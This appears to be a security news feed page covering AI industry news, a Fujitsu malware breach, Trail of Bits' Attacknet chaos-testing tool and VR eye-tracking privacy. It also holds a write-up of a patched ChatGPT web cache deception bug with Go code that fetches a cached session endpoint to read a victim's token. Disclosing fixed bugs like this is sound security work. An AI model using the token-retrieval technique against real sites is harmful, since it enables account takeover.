Security Posts



ISC Stormcast For Tuesday, March 19th, 2024 https://isc.sans.edu/podcastdetail/8900, (Tue, Mar 19th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Apple may hire Google to power new iPhone AI features using Gemini—report

ArsTechnica: Security Content - Mon, 2024/03/18 - 21:56
(Image credit: Benj Edwards) On Monday, Bloomberg reported that Apple is in talks to license Google's Gemini model to power AI features like Siri in a future iPhone software update coming later in 2024, according to people familiar with the situation. Apple has also reportedly conducted similar talks with ChatGPT maker OpenAI. The potential integration of Google Gemini into iOS 18 could bring a range of new cloud-based (off-device) AI-powered features to Apple's smartphone, including image creation or essay writing based on simple prompts. However, the terms and branding of the agreement have not yet been finalized, and the implementation details remain unclear. The companies are unlikely to announce any deal until Apple's annual Worldwide Developers Conference in June. Gemini could also bring new capabilities to Apple's widely criticized voice assistant, Siri, which trails newer AI assistants powered by large language models (LLMs) in understanding and responding to complex questions. Rumors of Apple's own internal frustration with Siri, and potential remedies, have been kicking around for some time. In January, 9to5Mac revealed that Apple had been conducting tests with a beta version of iOS 17.4 that used OpenAI's ChatGPT API to power Siri.

Fujitsu says it found malware on its corporate network, warns of possible data breach

ArsTechnica: Security Content - Mon, 2024/03/18 - 21:44
(Image credit: Getty Images) Japan-based IT behemoth Fujitsu said it has discovered malware on its corporate network that may have allowed the people responsible to steal personal information from customers or other parties. “We confirmed the presence of malware on several of our company's work computers, and as a result of an internal investigation, it was discovered that files containing personal information and customer information could be illegally taken out,” company officials wrote in a March 15 notification that went largely unnoticed until Monday. The company said it continued to “investigate the circumstances surrounding the malware's intrusion and whether information has been leaked.” There was no indication of how many records were exposed or how many people may be affected. Fujitsu employs 124,000 people worldwide and reported about $25 billion in revenue in its fiscal 2023, which ended last March. The company operates in 100 countries, and its past customers include the Japanese government. Fujitsu’s revenue comes from sales of hardware such as computers, servers, and telecommunications gear, along with storage systems, software, and IT services.

Dell tells remote workers that they won’t be eligible for promotion

ArsTechnica: Security Content - Mon, 2024/03/18 - 21:07
(Image credit: Getty) Starting in May, Dell employees who are fully remote will not be eligible for promotion, Business Insider (BI) reported Saturday. The upcoming policy update represents a dramatic reversal from Dell's prior stance on work from home (WFH), which included CEO Michael Dell saying: "If you are counting on forced hours spent in a traditional office to create collaboration and provide a feeling of belonging within your organization, you’re doing it wrong." Most Dell employees will be classified as either "remote" or "hybrid" starting in May, BI reported. Hybrid workers must come into the office at least 39 days per quarter, Dell confirmed to Ars Technica, which works out to roughly three times a week. Those who would prefer to never commute to an office will not "be considered for promotion, or be able to change roles," BI reported. "For remote team members, it is important to understand the trade-offs: Career advancement, including applying to new roles in the company, will require a team member to reclassify as hybrid onsite," Dell's memo to workers said, per BI.

Elon Musk’s xAI releases Grok source and weights, taunting OpenAI

ArsTechnica: Security Content - Mon, 2024/03/18 - 18:55
(Image: An AI-generated image released by xAI during the open-weights launch of Grok-1. Credit: xAI) On Sunday, Elon Musk's AI firm xAI released the base model weights and network architecture of Grok-1, a large language model designed to compete with the models that power OpenAI's ChatGPT. The open-weights release through GitHub and BitTorrent comes as Musk continues to criticize (and sue) rival OpenAI for not releasing its AI models in an open way. Announced in November, Grok is an AI assistant similar to ChatGPT that is available to X Premium+ subscribers, who pay $16 a month to the social media platform formerly known as Twitter. At its heart is a mixture-of-experts LLM called "Grok-1," clocking in at 314 billion parameters. As a reference, GPT-3 included 175 billion parameters. Parameter count is a rough measure of an AI model's complexity, reflecting its potential for generating more useful responses. xAI is releasing the base model of Grok-1, which is not fine-tuned for a specific task, so it is likely not the same model that X uses to power its Grok AI assistant. "This is the raw base model checkpoint from the Grok-1 pre-training phase, which concluded in October 2023," writes xAI on its release page. "This means that the model is not fine-tuned for any specific application, such as dialogue," meaning it's not necessarily shipping as a chatbot. But it will do next-token prediction, meaning it will complete a sentence (or other text prompt) with its estimation of the most relevant string of text.
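As a toy illustration of what next-token prediction means (this is emphatically not xAI's code: a three-entry bigram table stands in for a 314-billion-parameter model), a greedy completion loop in Go might look like this:

    // Toy greedy next-token prediction: repeatedly pick the most likely
    // successor of the last token and append it to the prompt.
    package main

    import "fmt"

    func main() {
        // Hypothetical bigram "model": each token maps to its single most
        // likely successor.
        next := map[string]string{
            "the":      "model",
            "model":    "predicts",
            "predicts": "the",
        }

        tokens := []string{"the"} // the prompt
        for i := 0; i < 5; i++ {
            successor, ok := next[tokens[len(tokens)-1]]
            if !ok {
                break
            }
            tokens = append(tokens, successor)
        }
        fmt.Println(tokens) // [the model predicts the model predicts]
    }

A real LLM replaces the lookup table with a probability distribution over its whole vocabulary, but the outer loop is the same idea.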

Releasing the Attacknet: A new tool for finding bugs in blockchain nodes using chaos testing

By Benjamin Samuels (@thebensams)

Today, Trail of Bits is publishing Attacknet, a new tool that addresses the limitations of traditional runtime verification tools, built in collaboration with the Ethereum Foundation. Attacknet is intended to augment the EF's current test methods by subjecting their execution and consensus clients to some of the most challenging network conditions imaginable.

Blockchain nodes must be held to the highest level of security assurance possible. Historically, the primary tools used to achieve this goal have been exhaustive specification, tests, client diversity, manual audits, and testnets. While these tools have traditionally done their job well, they collectively have serious limitations that can lead to critical bugs manifesting in a production environment, such as the May 2023 finality incident that occurred on Ethereum mainnet. Attacknet addresses these limitations by subjecting devnets to a much wider range of network conditions and misconfigurations than is possible on a conventional testnet.

How Attacknet works

Attacknet uses chaos engineering, a testing methodology that proactively injects faults into a production environment to verify that the system is tolerant of certain failures. These faults reproduce real-world problem scenarios and misconfigurations, and can be used to create exaggerated scenarios that test the boundary conditions of the blockchain. Attacknet uses Chaos Mesh to inject faults into a devnet environment generated by Kurtosis. By building on top of Kurtosis and Chaos Mesh, Attacknet can create various network topologies with ensembles of different kinds of faults to push a blockchain network to its most extreme edge cases. Some of the faults include (a sketch of how such a fault plan might be expressed follows the list):
  • Clock skew, where a node’s clock is skewed forwards or backwards for a specific duration. Trail of Bits was able to reproduce the Ethereum finality incident using a clock skew fault, as detailed in our TrustX talk last year.
  • Network latency, where a node’s connection to the network (or its corresponding EL/CL client) is delayed by a certain amount of time. This fault can help reproduce global latency conditions or help detect unintentional synchronicity assumptions in the blockchain’s consensus.
  • Network partition, where the network is split into two or more halves that cannot communicate with each other. This fault can test the network’s fork choice rule, ability to re-org, and other edge cases.
  • Network packet drop/corruption, where gossip packets are dropped or have their contents corrupted by a certain amount. This fault can test a node’s gossip validation and test the robustness of the network under hostile network conditions.
  • Forced node crashes/offlining, where a certain client or type of client is ungracefully shut down. This fault can test the network’s resilience to validator inactivity, and test the ability of clients to re-sync to the network.
  • I/O disk faults/latency, where a certain amount of latency or error rate is applied to all I/O operations a node makes. This fault can help profile nodes to understand their resource requirements, as I/O is often the largest limiting factor of node performance.
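To make the fault catalog above concrete, here is a minimal, hypothetical sketch of how such a fault plan might be represented. The FaultSpec type, its field names, and the client labels are illustrative assumptions, not Attacknet's actual configuration schema:

    // Hypothetical representation of a fault plan mirroring the fault
    // types listed above; not Attacknet's real schema.
    package main

    import (
        "fmt"
        "time"
    )

    type FaultSpec struct {
        Kind     string            // e.g. "clock-skew", "network-latency", "node-crash"
        Target   string            // label of the client or node the fault applies to
        Duration time.Duration     // how long the fault stays active
        Params   map[string]string // fault-specific knobs
    }

    func main() {
        plan := []FaultSpec{
            {"clock-skew", "prysm", 5 * time.Minute, map[string]string{"offset": "-10m"}},
            {"network-latency", "geth", 10 * time.Minute, map[string]string{"delay": "500ms"}},
            {"node-crash", "lighthouse", 0, map[string]string{"graceful": "false"}},
        }
        for _, f := range plan {
            fmt.Printf("inject %s on %s for %s (params: %v)\n", f.Kind, f.Target, f.Duration, f.Params)
        }
    }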
Once a fault concludes, Attacknet performs a battery of health checks against each node in the network to verify that it recovered from the fault. If all nodes recover, Attacknet moves on to the next configured fault. If one or more nodes fail their health checks, Attacknet generates an artifact of logs and test information to allow debugging.
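A minimal sketch of that recover-or-collect loop, assuming hypothetical helpers (healthy, collectArtifacts) in place of Attacknet's real health checks:

    // Post-fault health-check loop: every node must recover, otherwise
    // debugging artifacts are collected. Helpers are stand-ins.
    package main

    import "fmt"

    type Node struct{ Name string }

    // healthy stands in for real checks (peers connected, head advancing, etc.).
    func healthy(n Node) bool { return n.Name != "" }

    func collectArtifacts(n Node) { fmt.Println("saving logs for", n.Name) }

    func main() {
        nodes := []Node{{"geth-0"}, {"lighthouse-1"}}
        allRecovered := true
        for _, n := range nodes {
            if !healthy(n) {
                allRecovered = false
                collectArtifacts(n)
            }
        }
        if allRecovered {
            fmt.Println("all nodes recovered; moving to the next configured fault")
        }
    }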
Future work

In this first release, Attacknet supports two run modes: one with a manually configured network topology and fault parameters, and a "planner mode" in which a range of faults is run against a specific client with loosely defined topology parameters. In the future, we plan to add an "Exploration mode" that will dynamically define fault parameters, inject them, and monitor network health repeatedly, similar to a fuzzer. Attacknet is currently being used to test the Dencun hard fork and is being regularly updated to improve coverage, performance, and debugging UX. However, Attacknet is not an Ethereum-specific tool: it was designed to be modular and easily extended to support other types of chains with drastically different designs and topologies. In the future, we plan to extend Attacknet to target other chains, including other types of blockchain systems such as L2s. If you're interested in integrating Attacknet with your chain or L2's testing process, please contact us.

Exploring the risks of eye-tracking technology in VR security

AlienVault Blogs - Mon, 2024/03/18 - 12:00
The content of this post is solely the responsibility of the author. AT&T does not adopt or endorse any of the views, positions, or information provided by the author in this article.

Virtual reality (VR) offers profound benefits across industries, particularly in education and training, thanks to its immersive nature. Through tools such as 3D learning environments, VR enables learners to grasp theoretical concepts more quickly and efficiently. However, with the benefits come some dangers, and one such risk is the integration of eye-tracking technology within virtual reality environments. While eye tracking promises to improve experiences and strengthen security through biometric verification, it also raises privacy concerns. This technology, though handy, could be exploited by cybercriminals. For instance, a recent paper from Rutgers University shows that attackers could use the motion sensors in common AR/VR headsets to capture facial movements linked to speech, which could lead to the theft of sensitive data communicated through voice commands, such as credit card numbers and passwords. This article explores the risks of this new technology, looking into how the information collected from our eyes could be misused and what it means for our security in virtual worlds.

How does VR eye-tracking work?

Eye-tracking technology in virtual reality (VR) is a sophisticated system designed to monitor and analyze where and how a user's gaze moves while they are immersed in a VR environment. It achieves this through infrared sensors and cameras embedded in the VR headset. The sensors aim infrared light toward the eyes, and the cameras capture the reflection of this light off the cornea along with the position of the pupil; the system then analyzes these reflections and positions to accurately determine the direction in which the user is looking. Once the eye-tracking system gathers this data, it processes the information in real time, using sophisticated algorithms to interpret the user's gaze direction, eye movements, and other metrics such as pupil dilation and blink rate. This comprehensive data allows the VR system to understand precisely where the user is focusing their attention within the virtual environment.
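As a concrete illustration of the kind of record such a system produces, and of the on-device anonymization discussed later in this post, here is a minimal sketch in Go. The GazeSample type, its fields, and the anonymize function are illustrative assumptions, not any headset vendor's actual SDK:

    // Hypothetical gaze record plus on-device anonymization: strip the
    // identifier and coarsen the timestamp before anything is transmitted.
    package main

    import (
        "fmt"
        "time"
    )

    type GazeSample struct {
        UserID     string // direct identifier: should never leave the device
        Timestamp  time.Time
        DirX, DirY float64 // gaze direction in the headset's view plane
        PupilMM    float64 // pupil diameter, a sensitive physiological signal
    }

    func anonymize(s GazeSample) GazeSample {
        s.UserID = ""
        s.Timestamp = s.Timestamp.Truncate(time.Minute)
        return s
    }

    func main() {
        raw := GazeSample{"user-42", time.Now(), 0.12, -0.30, 3.9}
        fmt.Printf("%+v\n", anonymize(raw))
    }

Encrypting such samples in transit and at rest, as the mitigation section below notes, addresses the complementary risk of interception.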
At the rate at which VR technology is growing, most people instantly think of monitoring and data selling, but it is not all doom and gloom. We may be moving toward a futuristic workplace where we can focus on the creative aspects of our jobs: imagine a developer receiving suggestions about cloud cost optimization or about writing cleaner, more readable code. Still, the concerns have yet to be addressed.

Privacy concerns with eye-tracking technology

Don't get us wrong: eye-tracking technology can have many benefits. For instance, it has been used to identify cognitive disorders such as autism and attention deficit disorder, as well as mental and psychological illnesses like schizophrenia and Alzheimer's. It can also provide insights into a person's behavior, including potential indicators of drug and alcohol use. But the data it collects can go well beyond where an individual is looking, and this has been one of the main issues surrounding VR games. While the notion of monetizing eye-tracking data is still theoretical, there is a lot that companies can infer from it. This capability extends to understanding which advertisements catch our attention, how we process information on a webpage, and our reactions to various stimuli. While it may seem convenient to have your VR headset track your in-game activity and serve you tailored product suggestions or AI-generated answers, the true possibilities are much more sinister. Thus, safeguarding this data through robust privacy policies and data-centric security practices is essential to mitigate the risks associated with its misuse. As eye-tracking devices begin to parallel the ubiquity of webcams, regulators must stay ahead of data-hungry corporations.

Potential for misuse of eye-tracking data

Eye-tracking technology, while innovative and rich in potential for enhancing user experiences in various fields, including VR, also harbors significant risks regarding data privacy and security. The detailed data captured by eye tracking, ranging from where individuals look and how long they gaze at specific points to subtler metrics like pupil dilation, can reveal an enormous amount about a person's preferences, interests, and even their emotional or psychological state. This raises a significant ethical dilemma: what if companies like Google suddenly began collecting and storing data on users' eye movements? This could pose a problem for organizations planning to adopt VR technology in the future, especially those handling sensitive data. With an ever-more privacy-aware consumer base, such organizations might even be compelled to seek alternative cloud and email providers, among other measures, to protect their users' privacy and adapt to their preferences. The potential risks of eye-tracking data misuse are vast and varied; here is a concise overview of some of the more pressing issues:
  1. Personal profiling. Eye-tracking data can be used to construct detailed profiles of users, including their interests, habits, and behaviors. This information could potentially be exploited for targeted advertising in a way that infringes on personal privacy.
  2. Surveillance. In the wrong hands, eye-tracking data could serve as a tool for surveillance, allowing unauthorized tracking of an individual's focus and attention in both digital and physical spaces.
  3. Manipulation and influence. Knowing what captures a person's attention or triggers emotional responses could give people or organizations the power to manipulate decisions. Imagine WordPress tapping into its database of 455 million websites and using eye-tracking data to suggest plugins and other products to the users it deems most likely to purchase them.
  4. Security breaches. Like any digital data, eye-tracking information is susceptible to hacking and unauthorized access. If such data were compromised, it could lead to identity theft, blackmail, or other forms of cybercrime, particularly if combined with other personal data.
  5. Unintended inferences. Eye-tracking could inadvertently expose sensitive information about a person's health (e.g., detecting conditions like Parkinson's or Alzheimer's disease based on eye movement patterns) or other personal attributes without their consent. 
To mitigate these risks, robust data protection measures, transparent user consent processes, and strict regulatory frameworks need to be established and enforced. Users should be fully informed about what data is being collected, how it is being used, and who has access to it, ensuring a balance between technological advancement and the protection of individual privacy rights.

Mitigating the risks

To mitigate the risks associated with eye-tracking technology, VR companies can encrypt the data it collects so that, even if intercepted, it remains inaccessible to unauthorized users. Encryption should be applied both during data transmission and when storing data. For instance, a contractor should be able to use a Star Trek-like iteration of virtual reality, not the holodeck but specialized roofing software that lets them examine in VR the roofs they will work on, without worrying about leaving traces of their personal data online. Companies can also anonymize data: anonymizing means stripping away personally identifiable information so that the data cannot be traced back to an individual. This technique can be particularly useful for research or aggregate analysis, where individual user details are not necessary. Innovation in privacy-preserving technologies can enable the benefits of eye tracking in VR while minimizing data collection; for example, processing data locally on the device and transmitting only necessary, anonymized data to servers can reduce privacy risks.

Conclusion

As eye-tracking technology grows, it will take us to amazing places we have only dreamed of. But the real success will be protecting people's privacy and respecting them in these digital worlds. As we explore these new technologies, we must also remember the values that make us human. Dialogue and collaboration among tech creators, legal experts, policymakers, and users are key to ensuring that eye tracking in VR and AR benefits us without risking our privacy or safety. It is important to be transparent, to let people control their own data, and to work together to strike a good balance between innovation and privacy.

How to steal ChatGPT accounts with "Wildcard Web Cache Deception"

Un informático en el lado del mal - Mon, 2024/03/18 - 07:01
Yesterday I told you about three bugs discovered through a ChatGPT Bug Bounty; today I bring you another one, published this past February, which describes how to steal ChatGPT accounts using Wildcard Web Cache Deception. It is more than interesting, and it earned the researcher who discovered it 6,500 USD.
Figure 1: How to steal ChatGPT accounts with "Wildcard Web Cache Deception"
The bug was published once it had been fixed, and it is quite a curious one: the problem lies in how ChatGPT's cache was implemented, which the researcher exploited to build a working attack capable of stealing the account of any user who clicked a malicious link, thereby earning his Bug Bounty.
Figure 2: The Bug Bounty book De profesión "Cazarrecompensas", from 0xWord, written by Pablo García
According to the researcher's own write-up, he noticed the bug because ChatGPT was caching a request made when he used the Share option to share a conversation. Even if he kept updating the conversation, it remained static at the shared link, because everything under /share/ was cached automatically once that URL was visited; the server was returning the HTTP header Cf-Cache-Status: HIT for that URL.
Figure 3: The /share/ path was being cached automatically.
Knowing this, the next step was to see whether he could craft a URL that would return a user's authentication token while sitting under a /share/ path. This is possible because the cache is not a web server that processes the URL: it simply treats the URL as an address from which to derive the ID of a cached object. So, if %2F sequences or wildcards are used to build a URL that the web server will decode and process, the caching service will not.

Figure 4: Path Traversal Confusion
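A minimal sketch of that parsing discrepancy (the URL is illustrative, not the exact payload from the write-up): Go's net/url keeps the raw, percent-encoded path, which is what a cache keying on the literal string sees, separate from the decoded path that the origin routes on.

    // Cache/origin parsing discrepancy behind the wildcard web cache
    // deception; illustrative URL, not the write-up's exact payload.
    package main

    import (
        "fmt"
        "net/url"
        "strings"
    )

    func main() {
        raw := "https://chat.openai.com/api/auth/session/%2F/share/anything"
        u, err := url.Parse(raw)
        if err != nil {
            panic(err)
        }

        // A cache keying on the literal path sees a "/share/" segment and
        // applies the wildcard caching rule.
        fmt.Println("cache sees: ", u.EscapedPath())

        // An origin that decodes %2F before routing may still resolve the
        // request to the authenticated session endpoint.
        fmt.Println("origin sees:", u.Path)
        fmt.Println("session endpoint?", strings.HasPrefix(u.Path, "/api/auth/session"))
    }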
Figure 5: The URLs for the attack
Once that was confirmed, all it takes is crafting the right URL so that the victim hands over their authentication token: they follow the link, go through the authentication process (or not), and their token is left stored in the cache, where the attacker can retrieve it later.
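A hedged sketch of the attacker's side of that flow, reusing the illustrative URL from above: once the victim has visited the link, the attacker requests the same address and checks Cloudflare's Cf-Cache-Status response header for a HIT, meaning the cached copy, token included, was served.

    // Attacker retrieving the cached response; Cf-Cache-Status is the real
    // Cloudflare header the write-up mentions, the URL is illustrative.
    package main

    import (
        "fmt"
        "io"
        "net/http"
    )

    func main() {
        resp, err := http.Get("https://chat.openai.com/api/auth/session/%2F/share/anything")
        if err != nil {
            panic(err)
        }
        defer resp.Body.Close()

        if resp.Header.Get("Cf-Cache-Status") == "HIT" {
            body, _ := io.ReadAll(resp.Body)
            fmt.Println("cached session payload:", string(body)) // would contain the victim's token
        }
    }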
Figure 6: The complete attack scheme
In this case, the victim must click a malicious link, as shown in the attack scheme, but it is a very dangerous 1-Click Owned! scheme, which ChatGPT has already fixed to eliminate the problem.

Figure 7: Hacker & Developer in the Age of GenAI LLM Apps & Services
In the end, this is not a problem with the LLM itself, and it would not fit into any category of the OWASP Top 10 for LLM Apps & Services, since the problem lies in the implementation of the sharing system; still, it is more than interesting to see how this bug works.
¡Saludos Malignos!
Author: Chema Alonso (Contact Chema Alonso)



Cybersecurity Concerns for Ancillary Strength Control Subsystems

BreakingPoint Labs Blog - Thu, 2023/10/19 - 19:08
Additive manufacturing (AM) engineers have been incredibly creative in developing ancillary systems that modify a printed part's mechanical properties. These systems mostly focus on the issue of anisotropic properties in additively built components. This blog post is a good reference if you are unfamiliar with isotropic vs. anisotropic properties and how they impact 3D printing. […]

Update on Naked Security

Naked Security Sophos - Tue, 2023/09/26 - 12:00
To consolidate all of our security intelligence and news in one location, we have migrated Naked Security to the Sophos News platform.
